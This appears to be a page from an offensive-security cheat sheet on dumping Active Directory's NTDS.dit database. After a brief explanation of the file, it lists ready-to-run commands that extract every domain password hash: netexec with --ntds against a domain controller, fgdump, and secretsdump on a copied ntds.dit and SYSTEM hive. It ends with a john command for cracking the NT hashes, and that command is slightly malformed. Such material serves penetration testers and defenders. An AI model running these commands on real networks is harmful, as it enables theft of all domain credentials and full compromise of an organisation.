Dumping NTDS.dit

What is NTDS.dit ?

The NTDS file is the database for Microsoft's Active Directory. The NTDS file is stored on each domain controller and is created when a Windows server is promoted to domain controller. Its default location is: %SystemRoot%\ntds\NTDS.DIT.

NTDS.dit contains all the info on the domain (hashes...).

netexec

# dump ntds on domain controller
nxc smb $dc_ip -u $admin_user -p $pass --ntds

FGDump

.\fgdump.exe

secretsdump

# when you have the ntds.dit
./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

Cracking the hashes

john --format=NT hash --show

PreviousDumping LSASS NextGolden Tickets

Last updated 2 years ago

hashtagnetexec

hashtagFGDump

hashtagsecretsdump

hashtagCracking the hashes

netexec

FGDump

secretsdump

Cracking the hashes